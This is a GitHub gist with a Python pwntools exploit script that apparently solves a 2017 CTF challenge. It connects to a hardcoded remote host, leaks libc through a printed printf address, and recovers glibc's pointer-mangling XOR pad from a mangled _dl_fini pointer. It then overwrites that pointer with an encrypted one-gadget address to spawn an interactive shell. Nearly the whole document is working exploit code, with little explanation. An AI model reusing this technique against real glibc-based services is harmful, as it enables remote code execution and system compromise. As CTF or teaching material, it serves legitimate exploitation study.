Skip to content

Instantly share code, notes, and snippets.

@romanking98
Created December 17, 2017 16:07
Show Gist options
  • Save romanking98/5f5ff9114fc011c9ac8c88aa253bcc69 to your computer and use it in GitHub Desktop.
Save romanking98/5f5ff9114fc011c9ac8c88aa253bcc69 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from pwn import *
rol1 = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
elf = ELF("./libc-2.23.so.1")
p = remote("159.203.116.12", 7777)
#p = process("./left",env={"LD_PRELOAD":"./libc-2.23.so.1"})
raw_input()
p.recvuntil("printf(): ")
libc = p.recvline().strip("\n")
libc = int(libc) - elf.symbols['printf']
#dl_fini = libc + 0x3d9ca0
dl_fini = libc + 0x3daab0
canary = libc + 0x3c5c58
log.info("Libc: " + hex(libc))
log.info("_dl_fini: " + hex(dl_fini))
log.info("canary: " + hex(canary))
p.sendline(str(canary))
p.recvuntil("content: ")
leak = p.recvline().strip("\n")
leak = int(leak)
log.info("leak: " + hex(leak))
p.recvuntil("write address:")
p.sendline(str(canary))
p.recvuntil("new value:")
# Deduce xor pad.
# Then encrpypt with xor pad magic gadget address
# Write that
# sendline(fixed)
var1 = dl_fini
new_leak = ror1(leak,0x0000000000000011,64)
print hex(new_leak)
var2 = new_leak
#var1 = var2 ^ xorpad
xorpad = var2 ^ var1
#magic = 0x45216 + libc
#magic = libc + 0xf1117
#magic = libc + 0xf0274
magic = libc + 0x4526a
#magic = 0x4006bd
log.info("Magic: " + hex(magic))
enc = magic ^ xorpad
enc = rol1(enc,0x11,64)
p.sendline(str(enc))
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment